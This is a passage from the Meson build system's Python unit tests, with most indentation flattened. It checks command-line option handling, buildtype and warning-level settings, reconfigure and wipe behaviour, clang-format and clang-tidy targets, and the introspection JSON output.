if env.detect_c_compiler(MachineChoice.HOST).get_id() in {'msvc', 'clang-cl', 'intel-cl'}:
# msvc-like compiler, also test it with msvc-specific flags
libdir_flags += ['/LIBPATH:', '-LIBPATH:']
else:
# Static libraries are not linkable with -l with msvc because meson installs them
# as .a files, which unix_args_to_native will not recognize since it expects libraries
# to use the .lib extension. For a DLL the import library is installed as .lib. Thus
# for msvc this test needs to use shared libraries to exercise the path-resolving
# logic in the dependency generation code path.
extra_args = ['--default-library', 'static']
initial_builddir = self.builddir
initial_installdir = self.installdir
for libdir_flag in libdir_flags:
# build library
self.new_builddir()
self.init(testdirlib, extra_args=extra_args)
self.build()
self.install()
libbuilddir = self.builddir
installdir = self.installdir
libdir = os.path.join(self.installdir, self.prefix.lstrip('/').lstrip('\\'), 'lib')
# build user of library
self.new_builddir()
# replace is needed because meson mangles platform paths passed via LDFLAGS
self.init(os.path.join(testdirbase, 'exe'),
override_envvars={"LDFLAGS": '{}{}'.format(libdir_flag, libdir.replace('\\', '/'))})
self.build()
self.assertBuildIsNoop()
# rebuild library
exebuilddir = self.builddir
self.installdir = installdir
self.builddir = libbuilddir
# Microsoft's compiler is quite smart about touching import libs on changes,
# so ensure that there is actually a change in symbols.
self.setconf('-Dmore_exports=true')
self.build()
self.install()
# no ensure_backend_detects_changes needed because self.setconf did that already
# assert user of library will be rebuild
self.builddir = exebuilddir
self.assertRebuiltTarget('app')
# restore dirs for the next test case
self.installdir = initial_installdir
self.builddir = initial_builddir
def test_conflicting_d_dash_option(self):
testdir = os.path.join(self.unit_test_dir, '37 mixed command line args')
with self.assertRaises(subprocess.CalledProcessError) as e:
self.init(testdir, extra_args=['-Dbindir=foo', '--bindir=bar'])
# Just to ensure that we caught the correct error
self.assertIn('passed as both', e.stderr)
def _test_same_option_twice(self, arg, args):
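# Helper: pass the same option twice when configuring and check that the last value wins.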
testdir = os.path.join(self.unit_test_dir, '37 mixed command line args')
self.init(testdir, extra_args=args)
opts = self.introspect('--buildoptions')
for item in opts:
if item['name'] == arg:
self.assertEqual(item['value'], 'bar')
return
raise Exception('Missing {} value?'.format(arg))
def test_same_dash_option_twice(self):
self._test_same_option_twice('bindir', ['--bindir=foo', '--bindir=bar'])
def test_same_d_option_twice(self):
self._test_same_option_twice('bindir', ['-Dbindir=foo', '-Dbindir=bar'])
def test_same_project_d_option_twice(self):
self._test_same_option_twice('one', ['-Done=foo', '-Done=bar'])
def _test_same_option_twice_configure(self, arg, args):
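# Same as above, but the duplicated option is passed via `meson configure` on an existing build dir.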
testdir = os.path.join(self.unit_test_dir, '37 mixed command line args')
self.init(testdir)
self.setconf(args)
opts = self.introspect('--buildoptions')
for item in opts:
if item['name'] == arg:
self.assertEqual(item['value'], 'bar')
return
raise Exception('Missing {} value?'.format(arg))
def test_same_dash_option_twice_configure(self):
self._test_same_option_twice_configure(
'bindir', ['--bindir=foo', '--bindir=bar'])
def test_same_d_option_twice_configure(self):
self._test_same_option_twice_configure(
'bindir', ['-Dbindir=foo', '-Dbindir=bar'])
def test_same_project_d_option_twice_configure(self):
self._test_same_option_twice_configure(
'one', ['-Done=foo', '-Done=bar'])
def test_command_line(self):
testdir = os.path.join(self.unit_test_dir, '34 command line')
# Verify default values when passing no args that affect the
# configuration, and as a bonus, test that --profile-self works.
self.init(testdir, extra_args=['--profile-self'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['default_library'].value, 'static')
self.assertEqual(obj.builtins['warning_level'].value, '1')
self.assertEqual(obj.user_options['set_sub_opt'].value, True)
self.assertEqual(obj.user_options['subp:subp_opt'].value, 'default3')
self.wipe()
# warning_level is special, it's --warnlevel instead of --warning-level
# for historical reasons
self.init(testdir, extra_args=['--warnlevel=2'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '2')
self.setconf('--warnlevel=3')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '3')
self.wipe()
# But when using -D syntax, it should be 'warning_level'
self.init(testdir, extra_args=['-Dwarning_level=2'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '2')
self.setconf('-Dwarning_level=3')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '3')
self.wipe()
# Mixing --option and -Doption is forbidden
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.init(testdir, extra_args=['--warnlevel=1', '-Dwarning_level=3'])
self.assertNotEqual(0, cm.exception.returncode)
self.assertIn('as both', cm.exception.output)
self.init(testdir)
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.setconf(['--warnlevel=1', '-Dwarning_level=3'])
self.assertNotEqual(0, cm.exception.returncode)
self.assertIn('as both', cm.exception.output)
self.wipe()
# --default-library should override default value from project()
self.init(testdir, extra_args=['--default-library=both'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['default_library'].value, 'both')
self.setconf('--default-library=shared')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['default_library'].value, 'shared')
if self.backend is Backend.ninja:
# reconfigure target works only with ninja backend
self.build('reconfigure')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['default_library'].value, 'shared')
self.wipe()
# Should warn on unknown options
out = self.init(testdir, extra_args=['-Dbad=1', '-Dfoo=2', '-Dwrong_link_args=foo'])
self.assertIn('Unknown options: "bad, foo, wrong_link_args"', out)
self.wipe()
# Should fail on malformed option
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.init(testdir, extra_args=['-Dfoo'])
self.assertNotEqual(0, cm.exception.returncode)
self.assertIn('Option \'foo\' must have a value separated by equals sign.', cm.exception.output)
self.init(testdir)
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.setconf('-Dfoo')
self.assertNotEqual(0, cm.exception.returncode)
self.assertIn('Option \'foo\' must have a value separated by equals sign.', cm.exception.output)
self.wipe()
        # It is not an error to set a wrong option for unknown subprojects or
        # languages because we have no control over which one will be selected.
self.init(testdir, extra_args=['-Dc_wrong=1', '-Dwrong:bad=1', '-Db_wrong=1'])
self.wipe()
# Test we can set subproject option
self.init(testdir, extra_args=['-Dsubp:subp_opt=foo'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.user_options['subp:subp_opt'].value, 'foo')
self.wipe()
# c_args value should be parsed with split_args
self.init(testdir, extra_args=['-Dc_args=-Dfoo -Dbar "-Dthird=one two"'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.compiler_options.host['c']['args'].value, ['-Dfoo', '-Dbar', '-Dthird=one two'])
self.setconf('-Dc_args="foo bar" one two')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.compiler_options.host['c']['args'].value, ['foo bar', 'one', 'two'])
self.wipe()
self.init(testdir, extra_args=['-Dset_percent_opt=myoption%'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.user_options['set_percent_opt'].value, 'myoption%')
self.wipe()
        # Setting the same option a second time should override the first value
try:
self.init(testdir, extra_args=['--bindir=foo', '--bindir=bar',
'-Dbuildtype=plain', '-Dbuildtype=release',
'-Db_sanitize=address', '-Db_sanitize=thread',
'-Dc_args=-Dfoo', '-Dc_args=-Dbar'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['bindir'].value, 'bar')
self.assertEqual(obj.builtins['buildtype'].value, 'release')
self.assertEqual(obj.base_options['b_sanitize'].value, 'thread')
self.assertEqual(obj.compiler_options.host['c']['args'].value, ['-Dbar'])
self.setconf(['--bindir=bar', '--bindir=foo',
'-Dbuildtype=release', '-Dbuildtype=plain',
'-Db_sanitize=thread', '-Db_sanitize=address',
'-Dc_args=-Dbar', '-Dc_args=-Dfoo'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['bindir'].value, 'foo')
self.assertEqual(obj.builtins['buildtype'].value, 'plain')
self.assertEqual(obj.base_options['b_sanitize'].value, 'address')
self.assertEqual(obj.compiler_options.host['c']['args'].value, ['-Dfoo'])
self.wipe()
except KeyError:
            # Ignore KeyError, it happens on CI for compilers that do not
            # support b_sanitize. We have to test with a base option because
            # they used to fail this test with Meson 0.46 and earlier versions.
pass
def test_warning_level_0(self):
testdir = os.path.join(self.common_test_dir, '214 warning level 0')
# Verify default values when passing no args
self.init(testdir)
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '0')
self.wipe()
# verify we can override w/ --warnlevel
self.init(testdir, extra_args=['--warnlevel=1'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '1')
self.setconf('--warnlevel=0')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '0')
self.wipe()
# verify we can override w/ -Dwarning_level
self.init(testdir, extra_args=['-Dwarning_level=1'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '1')
self.setconf('-Dwarning_level=0')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '0')
self.wipe()
def test_feature_check_usage_subprojects(self):
testdir = os.path.join(self.unit_test_dir, '41 featurenew subprojects')
out = self.init(testdir)
# Parent project warns correctly
self.assertRegex(out, "WARNING: Project targeting '>=0.45'.*'0.47.0': dict")
# Subprojects warn correctly
self.assertRegex(out, r"\|WARNING: Project targeting '>=0.40'.*'0.44.0': disabler")
self.assertRegex(out, r"\|WARNING: Project targeting '!=0.40'.*'0.44.0': disabler")
# Subproject has a new-enough meson_version, no warning
self.assertNotRegex(out, "WARNING: Project targeting.*Python")
# Ensure a summary is printed in the subproject and the outer project
self.assertRegex(out, r"\|WARNING: Project specifies a minimum meson_version '>=0.40'")
self.assertRegex(out, r"\| \* 0.44.0: {'disabler'}")
self.assertRegex(out, "WARNING: Project specifies a minimum meson_version '>=0.45'")
self.assertRegex(out, " * 0.47.0: {'dict'}")
def test_configure_file_warnings(self):
testdir = os.path.join(self.common_test_dir, "14 configure file")
out = self.init(testdir)
self.assertRegex(out, "WARNING:.*'empty'.*config.h.in.*not present.*")
self.assertRegex(out, "WARNING:.*'FOO_BAR'.*nosubst-nocopy2.txt.in.*not present.*")
self.assertRegex(out, "WARNING:.*'empty'.*config.h.in.*not present.*")
self.assertRegex(out, "WARNING:.*empty configuration_data.*test.py.in")
# Warnings for configuration files that are overwritten.
self.assertRegex(out, "WARNING:.*\"double_output.txt\".*overwrites")
self.assertRegex(out, "WARNING:.*\"subdir.double_output2.txt\".*overwrites")
self.assertNotRegex(out, "WARNING:.*no_write_conflict.txt.*overwrites")
self.assertNotRegex(out, "WARNING:.*@BASENAME@.*overwrites")
self.assertRegex(out, "WARNING:.*\"sameafterbasename\".*overwrites")
# No warnings about empty configuration data objects passed to files with substitutions
self.assertNotRegex(out, "WARNING:.*empty configuration_data.*nosubst-nocopy1.txt.in")
self.assertNotRegex(out, "WARNING:.*empty configuration_data.*nosubst-nocopy2.txt.in")
with open(os.path.join(self.builddir, 'nosubst-nocopy1.txt'), 'rb') as f:
self.assertEqual(f.read().strip(), b'/* #undef FOO_BAR */')
with open(os.path.join(self.builddir, 'nosubst-nocopy2.txt'), 'rb') as f:
self.assertEqual(f.read().strip(), b'')
self.assertRegex(out, r"DEPRECATION:.*\['array'\] is invalid.*dict")
def test_dirs(self):
with tempfile.TemporaryDirectory() as containing:
with tempfile.TemporaryDirectory(dir=containing) as srcdir:
mfile = os.path.join(srcdir, 'meson.build')
                with open(mfile, 'w') as of:
                    of.write("project('foobar', 'c')\n")
pc = subprocess.run(self.setup_command,
cwd=srcdir,
stdout=subprocess.PIPE,
stderr=subprocess.DEVNULL)
self.assertIn(b'Must specify at least one directory name', pc.stdout)
with tempfile.TemporaryDirectory(dir=srcdir) as builddir:
subprocess.run(self.setup_command,
check=True,
cwd=builddir,
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
def get_opts_as_dict(self):
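        # Helper returning the current --buildoptions introspection as a
        # name -> value dictionary.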
result = {}
for i in self.introspect('--buildoptions'):
result[i['name']] = i['value']
return result
def test_buildtype_setting(self):
testdir = os.path.join(self.common_test_dir, '1 trivial')
self.init(testdir)
opts = self.get_opts_as_dict()
self.assertEqual(opts['buildtype'], 'debug')
self.assertEqual(opts['debug'], True)
self.setconf('-Ddebug=false')
opts = self.get_opts_as_dict()
self.assertEqual(opts['debug'], False)
self.assertEqual(opts['buildtype'], 'plain')
self.assertEqual(opts['optimization'], '0')
# Setting optimizations to 3 should cause buildtype
# to go to release mode.
self.setconf('-Doptimization=3')
opts = self.get_opts_as_dict()
self.assertEqual(opts['buildtype'], 'release')
self.assertEqual(opts['debug'], False)
self.assertEqual(opts['optimization'], '3')
# Going to debug build type should reset debugging
# and optimization
self.setconf('-Dbuildtype=debug')
opts = self.get_opts_as_dict()
self.assertEqual(opts['buildtype'], 'debug')
self.assertEqual(opts['debug'], True)
self.assertEqual(opts['optimization'], '0')
# Command-line parsing of buildtype settings should be the same as
# setting with `meson configure`.
#
# Setting buildtype should set optimization/debug
self.new_builddir()
self.init(testdir, extra_args=['-Dbuildtype=debugoptimized'])
opts = self.get_opts_as_dict()
self.assertEqual(opts['debug'], True)
self.assertEqual(opts['optimization'], '2')
self.assertEqual(opts['buildtype'], 'debugoptimized')
# Setting optimization/debug should set buildtype
self.new_builddir()
self.init(testdir, extra_args=['-Doptimization=2', '-Ddebug=true'])
opts = self.get_opts_as_dict()
self.assertEqual(opts['debug'], True)
self.assertEqual(opts['optimization'], '2')
self.assertEqual(opts['buildtype'], 'debugoptimized')
# Setting both buildtype and debug on the command-line should work, and
# should warn not to do that. Also test that --debug is parsed as -Ddebug=true
self.new_builddir()
out = self.init(testdir, extra_args=['-Dbuildtype=debugoptimized', '--debug'])
self.assertRegex(out, 'Recommend using either.*buildtype.*debug.*redundant')
opts = self.get_opts_as_dict()
self.assertEqual(opts['debug'], True)
self.assertEqual(opts['optimization'], '2')
self.assertEqual(opts['buildtype'], 'debugoptimized')
@skipIfNoPkgconfig
@unittest.skipIf(is_windows(), 'Help needed with fixing this test on windows')
def test_native_dep_pkgconfig(self):
testdir = os.path.join(self.unit_test_dir,
'46 native dep pkgconfig var')
with tempfile.NamedTemporaryFile(mode='w', delete=False) as crossfile:
crossfile.write(textwrap.dedent(
'''[binaries]
pkgconfig = '{0}'
[properties]
[host_machine]
system = 'linux'
cpu_family = 'arm'
cpu = 'armv7'
endian = 'little'
'''.format(os.path.join(testdir, 'cross_pkgconfig.py'))))
crossfile.flush()
self.meson_cross_file = crossfile.name
env = {'PKG_CONFIG_LIBDIR': os.path.join(testdir,
'native_pkgconfig')}
self.init(testdir, extra_args=['-Dstart_native=false'], override_envvars=env)
self.wipe()
self.init(testdir, extra_args=['-Dstart_native=true'], override_envvars=env)
@skipIfNoPkgconfig
@unittest.skipIf(is_windows(), 'Help needed with fixing this test on windows')
def test_pkg_config_libdir(self):
testdir = os.path.join(self.unit_test_dir,
'46 native dep pkgconfig var')
with tempfile.NamedTemporaryFile(mode='w', delete=False) as crossfile:
crossfile.write(textwrap.dedent(
'''[binaries]
pkgconfig = 'pkg-config'
[properties]
pkg_config_libdir = ['{0}']
[host_machine]
system = 'linux'
cpu_family = 'arm'
cpu = 'armv7'
endian = 'little'
'''.format(os.path.join(testdir, 'cross_pkgconfig'))))
crossfile.flush()
self.meson_cross_file = crossfile.name
env = {'PKG_CONFIG_LIBDIR': os.path.join(testdir,
'native_pkgconfig')}
self.init(testdir, extra_args=['-Dstart_native=false'], override_envvars=env)
self.wipe()
self.init(testdir, extra_args=['-Dstart_native=true'], override_envvars=env)
def __reconfigure(self, change_minor=False):
# Set an older version to force a reconfigure from scratch
filename = os.path.join(self.privatedir, 'coredata.dat')
with open(filename, 'rb') as f:
obj = pickle.load(f)
if change_minor:
v = mesonbuild.coredata.version.split('.')
obj.version = '.'.join(v[0:2] + [str(int(v[2]) + 1)])
else:
obj.version = '0.47.0'
with open(filename, 'wb') as f:
pickle.dump(obj, f)
def test_reconfigure(self):
testdir = os.path.join(self.unit_test_dir, '48 reconfigure')
self.init(testdir, extra_args=['-Dopt1=val1'])
self.setconf('-Dopt2=val2')
self.__reconfigure()
out = self.init(testdir, extra_args=['--reconfigure', '-Dopt3=val3'])
self.assertRegex(out, 'Regenerating configuration from scratch')
self.assertRegex(out, 'opt1 val1')
self.assertRegex(out, 'opt2 val2')
self.assertRegex(out, 'opt3 val3')
self.assertRegex(out, 'opt4 default4')
self.build()
self.run_tests()
# Create a file in builddir and verify wipe command removes it
filename = os.path.join(self.builddir, 'something')
open(filename, 'w').close()
self.assertTrue(os.path.exists(filename))
out = self.init(testdir, extra_args=['--wipe', '-Dopt4=val4'])
self.assertFalse(os.path.exists(filename))
self.assertRegex(out, 'opt1 val1')
self.assertRegex(out, 'opt2 val2')
self.assertRegex(out, 'opt3 val3')
self.assertRegex(out, 'opt4 val4')
self.build()
self.run_tests()
def test_wipe_from_builddir(self):
testdir = os.path.join(self.common_test_dir, '161 custom target subdir depend files')
self.init(testdir)
self.__reconfigure()
        # Path() is not a chdir context manager; change into the build
        # directory explicitly so the wipe really runs from inside it.
        olddir = os.getcwd()
        os.chdir(self.builddir)
        try:
            self.init(testdir, extra_args=['--wipe'])
        finally:
            os.chdir(olddir)
def test_minor_version_does_not_reconfigure_wipe(self):
testdir = os.path.join(self.unit_test_dir, '48 reconfigure')
self.init(testdir, extra_args=['-Dopt1=val1'])
self.setconf('-Dopt2=val2')
self.__reconfigure(change_minor=True)
out = self.init(testdir, extra_args=['--reconfigure', '-Dopt3=val3'])
self.assertNotRegex(out, 'Regenerating configuration from scratch')
self.assertRegex(out, 'opt1 val1')
self.assertRegex(out, 'opt2 val2')
self.assertRegex(out, 'opt3 val3')
self.assertRegex(out, 'opt4 default4')
self.build()
self.run_tests()
def test_target_construct_id_from_path(self):
# This id is stable but not guessable.
# The test is supposed to prevent unintentional
# changes of target ID generation.
target_id = Target.construct_id_from_path('some/obscure/subdir',
'target-id', '@suffix')
self.assertEqual('5e002d3@@target-id@suffix', target_id)
target_id = Target.construct_id_from_path('subproject/foo/subdir/bar',
'target2-id', '@other')
self.assertEqual('81d46d1@@target2-id@other', target_id)
def test_introspect_projectinfo_without_configured_build(self):
testfile = os.path.join(self.common_test_dir, '35 run program', 'meson.build')
res = self.introspect_directory(testfile, '--projectinfo')
self.assertEqual(set(res['buildsystem_files']), set(['meson.build']))
self.assertEqual(res['version'], 'undefined')
self.assertEqual(res['descriptive_name'], 'run command')
self.assertEqual(res['subprojects'], [])
testfile = os.path.join(self.common_test_dir, '43 options', 'meson.build')
res = self.introspect_directory(testfile, '--projectinfo')
self.assertEqual(set(res['buildsystem_files']), set(['meson_options.txt', 'meson.build']))
self.assertEqual(res['version'], 'undefined')
self.assertEqual(res['descriptive_name'], 'options')
self.assertEqual(res['subprojects'], [])
testfile = os.path.join(self.common_test_dir, '46 subproject options', 'meson.build')
res = self.introspect_directory(testfile, '--projectinfo')
self.assertEqual(set(res['buildsystem_files']), set(['meson_options.txt', 'meson.build']))
self.assertEqual(res['version'], 'undefined')
self.assertEqual(res['descriptive_name'], 'suboptions')
self.assertEqual(len(res['subprojects']), 1)
subproject_files = set(f.replace('\\', '/') for f in res['subprojects'][0]['buildsystem_files'])
self.assertEqual(subproject_files, set(['subprojects/subproject/meson_options.txt', 'subprojects/subproject/meson.build']))
self.assertEqual(res['subprojects'][0]['name'], 'subproject')
self.assertEqual(res['subprojects'][0]['version'], 'undefined')
self.assertEqual(res['subprojects'][0]['descriptive_name'], 'subproject')
def test_introspect_projectinfo_subprojects(self):
testdir = os.path.join(self.common_test_dir, '102 subproject subdir')
self.init(testdir)
res = self.introspect('--projectinfo')
expected = {
'descriptive_name': 'proj',
'version': 'undefined',
'subproject_dir': 'subprojects',
'subprojects': [
{
'descriptive_name': 'sub',
'name': 'sub',
'version': '1.0'
},
{
'descriptive_name': 'sub_implicit',
'name': 'sub_implicit',
'version': '1.0',
},
{
'descriptive_name': 'sub-novar',
'name': 'sub_novar',
'version': '1.0',
},
]
}
res['subprojects'] = sorted(res['subprojects'], key=lambda i: i['name'])
self.assertDictEqual(expected, res)
def test_introspection_target_subproject(self):
testdir = os.path.join(self.common_test_dir, '45 subproject')
self.init(testdir)
res = self.introspect('--targets')
expected = {
'sublib': 'sublib',
'simpletest': 'sublib',
'user': None
}
for entry in res:
name = entry['name']
self.assertEqual(entry['subproject'], expected[name])
def test_introspect_projectinfo_subproject_dir(self):
testdir = os.path.join(self.common_test_dir, '78 custom subproject dir')
self.init(testdir)
res = self.introspect('--projectinfo')
self.assertEqual(res['subproject_dir'], 'custom_subproject_dir')
def test_introspect_projectinfo_subproject_dir_from_source(self):
testfile = os.path.join(self.common_test_dir, '78 custom subproject dir', 'meson.build')
res = self.introspect_directory(testfile, '--projectinfo')
self.assertEqual(res['subproject_dir'], 'custom_subproject_dir')
@skipIfNoExecutable('clang-format')
def test_clang_format(self):
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Clang-format is for now only supported on Ninja, not {}'.format(self.backend.name))
testdir = os.path.join(self.unit_test_dir, '54 clang-format')
testfile = os.path.join(testdir, 'prog.c')
badfile = os.path.join(testdir, 'prog_orig_c')
goodfile = os.path.join(testdir, 'prog_expected_c')
testheader = os.path.join(testdir, 'header.h')
badheader = os.path.join(testdir, 'header_orig_h')
goodheader = os.path.join(testdir, 'header_expected_h')
try:
shutil.copyfile(badfile, testfile)
shutil.copyfile(badheader, testheader)
self.init(testdir)
self.assertNotEqual(Path(testfile).read_text(),
Path(goodfile).read_text())
self.assertNotEqual(Path(testheader).read_text(),
Path(goodheader).read_text())
self.run_target('clang-format')
self.assertEqual(Path(testheader).read_text(),
Path(goodheader).read_text())
finally:
if os.path.exists(testfile):
os.unlink(testfile)
if os.path.exists(testheader):
os.unlink(testheader)
@skipIfNoExecutable('clang-tidy')
def test_clang_tidy(self):
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Clang-tidy is for now only supported on Ninja, not {}'.format(self.backend.name))
if shutil.which('c++') is None:
raise unittest.SkipTest('Clang-tidy breaks when ccache is used and "c++" not in path.')
if is_osx():
raise unittest.SkipTest('Apple ships a broken clang-tidy that chokes on -pipe.')
testdir = os.path.join(self.unit_test_dir, '70 clang-tidy')
self.init(testdir, override_envvars={'CXX': 'c++'})
out = self.run_target('clang-tidy')
self.assertIn('cttest.cpp:4:20', out)
def test_identity_cross(self):
testdir = os.path.join(self.unit_test_dir, '71 cross')
# Do a build to generate a cross file where the host is this target
self.init(testdir, extra_args=['-Dgenerate=true'])
self.meson_cross_file = os.path.join(self.builddir, "crossfile")
self.assertTrue(os.path.exists(self.meson_cross_file))
# Now verify that this is detected as cross
self.new_builddir()
self.init(testdir)
def test_introspect_buildoptions_without_configured_build(self):
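        # --buildoptions introspected from the source tree should match the
        # result from a configured build directory.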
testdir = os.path.join(self.unit_test_dir, '59 introspect buildoptions')
testfile = os.path.join(testdir, 'meson.build')
res_nb = self.introspect_directory(testfile, ['--buildoptions'] + self.meson_args)
self.init(testdir, default_args=False)
res_wb = self.introspect('--buildoptions')
self.maxDiff = None
self.assertListEqual(res_nb, res_wb)
def test_meson_configure_from_source_does_not_crash(self):
testdir = os.path.join(self.unit_test_dir, '59 introspect buildoptions')
self._run(self.mconf_command + [testdir])
def test_introspect_buildoptions_cross_only(self):
testdir = os.path.join(self.unit_test_dir, '83 cross only introspect')
testfile = os.path.join(testdir, 'meson.build')
res = self.introspect_directory(testfile, ['--buildoptions'] + self.meson_args)
optnames = [o['name'] for o in res]
self.assertIn('c_args', optnames)
self.assertNotIn('build.c_args', optnames)
def test_introspect_json_dump(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
self.init(testdir)
infodir = os.path.join(self.builddir, 'meson-info')
self.assertPathExists(infodir)
def assertKeyTypes(key_type_list, obj):
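            # Check that every expected key is present in obj and has the
            # expected type.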
for i in key_type_list:
self.assertIn(i[0], obj)
self.assertIsInstance(obj[i[0]], i[1])
root_keylist = [
('benchmarks', list),
('buildoptions', list),
('buildsystem_files', list),
('dependencies', list),
('installed', dict),
('projectinfo', dict),
('targets', list),
('tests', list),
]
test_keylist = [
('cmd', list),
('env', dict),
('name', str),
('timeout', int),
('suite', list),
('is_parallel', bool),
('protocol', str),
('depends', list),
]
buildoptions_keylist = [
('name', str),
('section', str),
('type', str),
('description', str),
('machine', str),
]
buildoptions_typelist = [
('combo', str, [('choices', list)]),
('string', str, []),
('boolean', bool, []),
('integer', int, []),
('array', list, []),
]
buildoptions_sections = ['core', 'backend', 'base', 'compiler', 'directory', 'user', 'test']
buildoptions_machines = ['any', 'build', 'host']
dependencies_typelist = [
('name', str),
('version', str),
('compile_args', list),
('link_args', list),
]
targets_typelist = [
('name', str),
('id', str),
('type', str),
('defined_in', str),
('filename', list),
('build_by_default', bool),
('target_sources', list),
('installed', bool),
]
targets_sources_typelist = [
('language', str),
('compiler', list),
('parameters', list),
('sources', list),
('generated_sources', list),
]
# First load all files
res = {}
for i in root_keylist:
curr = os.path.join(infodir, 'intro-{}.json'.format(i[0]))
self.assertPathExists(curr)
with open(curr, 'r') as fp:
res[i[0]] = json.load(fp)
assertKeyTypes(root_keylist, res)
# Match target ids to input and output files for ease of reference
src_to_id = {}
out_to_id = {}
for i in res['targets']:
            # Debug output of the target currently being checked
            print(json.dumps(i))
out_to_id.update({os.path.relpath(out, self.builddir): i['id']
for out in i['filename']})
for group in i['target_sources']:
src_to_id.update({os.path.relpath(src, testdir): i['id']
for src in group['sources']})
# Check Tests and benchmarks
tests_to_find = ['test case 1', 'test case 2', 'benchmark 1']
deps_to_find = {'test case 1': [src_to_id['t1.cpp']],
'test case 2': [src_to_id['t2.cpp'], src_to_id['t3.cpp']],
'benchmark 1': [out_to_id['file2'], src_to_id['t3.cpp']]}
for i in res['benchmarks'] + res['tests']:
assertKeyTypes(test_keylist, i)
if i['name'] in tests_to_find:
tests_to_find.remove(i['name'])
self.assertEqual(sorted(i['depends']),
sorted(deps_to_find[i['name']]))
self.assertListEqual(tests_to_find, [])
# Check buildoptions
buildopts_to_find = {'cpp_std': 'c++11'}
for i in res['buildoptions']:
assertKeyTypes(buildoptions_keylist, i)
valid_type = False
for j in buildoptions_typelist:
if i['type'] == j[0]:
self.assertIsInstance(i['value'], j[1])
assertKeyTypes(j[2], i)
valid_type = True
break
self.assertIn(i['section'], buildoptions_sections)
self.assertIn(i['machine'], buildoptions_machines)
self.assertTrue(valid_type)
if i['name'] in buildopts_to_find:
self.assertEqual(i['value'], buildopts_to_find[i['name']])
buildopts_to_find.pop(i['name'], None)
self.assertDictEqual(buildopts_to_find, {})
# Check buildsystem_files
bs_files = ['meson.build', 'meson_options.txt', 'sharedlib/meson.build', 'staticlib/meson.build']
bs_files = [os.path.join(testdir, x) for x in bs_files]
self.assertPathListEqual(list(sorted(res['buildsystem_files'])), list(sorted(bs_files)))
# Check dependencies
dependencies_to_find = ['threads']
for i in res['dependencies']:
assertKeyTypes(dependencies_typelist, i)
if i['name'] in dependencies_to_find:
dependencies_to_find.remove(i['name'])
self.assertListEqual(dependencies_to_find, [])
# Check projectinfo
self.assertDictEqual(res['projectinfo'], {'version': '1.2.3', 'descriptive_name': 'introspection', 'subproject_dir': 'subprojects', 'subprojects': []})
# Check targets
targets_to_find = {
'sharedTestLib': ('shared library', True, False, 'sharedlib/meson.build'),
'staticTestLib': ('static library', True, False, 'staticlib/meson.build'),
'test1': ('executable', True, True, 'meson.build'),
'test2': ('executable', True, False, 'meson.build'),
'test3': ('executable', True, False, 'meson.build'),
}
for i in res['targets']:
assertKeyTypes(targets_typelist, i)
if i['name'] in targets_to_find:
tgt = targets_to_find[i['name']]
self.assertEqual(i['type'], tgt[0])
self.assertEqual(i['build_by_default'], tgt[1])
self.assertEqual(i['installed'], tgt[2])
self.assertPathEqual(i['defined_in'], os.path.join(testdir, tgt[3]))
targets_to_find.pop(i['name'], None)
for j in i['target_sources']:
assertKeyTypes(targets_sources_typelist, j)
self.assertDictEqual(targets_to_find, {})
def test_introspect_file_dump_equals_all(self):
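        # 'meson introspect --all' should return the same data as the
        # individual intro-*.json files written to meson-info.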
testdir = os.path.join(self.unit_test_dir, '57 introspection')
self.init(testdir)
res_all = self.introspect('--all')
res_file = {}
root_keylist = [
'benchmarks',
'buildoptions',
'buildsystem_files',
'dependencies',
'installed',
'projectinfo',
'targets',
'tests',
]
infodir = os.path.join(self.builddir, 'meson-info')
self.assertPathExists(infodir)
for i in root_keylist:
curr = os.path.join(infodir, 'intro-{}.json'.format(i))
self.assertPathExists(curr)
with open(curr, 'r') as fp:
res_file[i] = json.load(fp)
self.assertEqual(res_all, res_file)
def test_introspect_meson_info(self):
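        # meson-info.json must exist after configuration and contain the
        # expected top-level keys.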
testdir = os.path.join(self.unit_test_dir, '57 introspection')
introfile = os.path.join(self.builddir, 'meson-info', 'meson-info.json')
self.init(testdir)
self.assertPathExists(introfile)
with open(introfile, 'r') as fp:
res1 = json.load(fp)
for i in ['meson_version', 'directories', 'introspection', 'build_files_updated', 'error']:
self.assertIn(i, res1)
self.assertEqual(res1['error'], False)
self.assertEqual(res1['build_files_updated'], True)
def test_introspect_config_update(self):
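        # Option changes made via 'meson configure' must be reflected in the
        # regenerated intro-buildoptions.json file.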
testdir = os.path.join(self.unit_test_dir, '57 introspection')
introfile = os.path.join(self.builddir, 'meson-info', 'intro-buildoptions.json')
self.init(testdir)
self.assertPathExists(introfile)
with open(introfile, 'r') as fp:
res1 = json.load(fp)
self.setconf('-Dcpp_std=c++14')
self.setconf('-Dbuildtype=release')
for idx, i in enumerate(res1):
